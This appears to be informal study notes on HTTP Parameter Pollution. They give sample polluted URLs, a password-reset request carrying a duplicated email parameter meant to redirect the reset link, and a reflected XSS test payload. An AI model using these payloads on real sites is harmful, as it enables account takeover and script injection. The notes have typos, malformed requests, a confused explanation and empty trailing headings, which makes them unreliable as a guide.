HTTP Parameter Pollution (HPP) is a web application vulnerability that allows attackers to manipulate or retrieve hidden information by injecting encoded query string delimiters into existing parameters.

Example

1st vulnerability before mitigation

glass.com/index.aspx?page=select 1,2,3

2nd vulnerability after mitigation

glass.com/index.aspx?page=select 1,2&page=3

What we did here is pollute the 1,2,3 parameter with 1,2&page=3

where 1,2 was processed by the server and bcoz the server was not asked to 
check the next parameter it was just passed and resulted in getting the response for the 1,2page=3 where page=3 is the polluted area

another example for auth bypass in(password reset request)

Original Req
 
POST/resetpassword.do http/1.1
secruity_token_rameshtoken&[email protected]&sentlink=yes

vunlerable Req
 
POST/resetpassword.do http/1.1
secruity_token_rameshtoken&[email protected]&[email protected]&sentlink=yes

Testing on both side Client and Server

Server-Side

1 Req
xttp://flass.com/?search=cat

2 Req
xttp://flass.com/?search=cat&search=dog

Client-Side

Reflected XSS is also a client side. HPP

xttp://flass.com/?search=cat

xttp://flass.com/?search=<script>alert(2)</script> didnt worked

xttp://flass.com/?search=cat&search=<script>alert(2)</script> this worked

any result that reflects back to you or on the client side 

Testing Scope and Vectors and preferred areas to test the target

Automation

Testing methods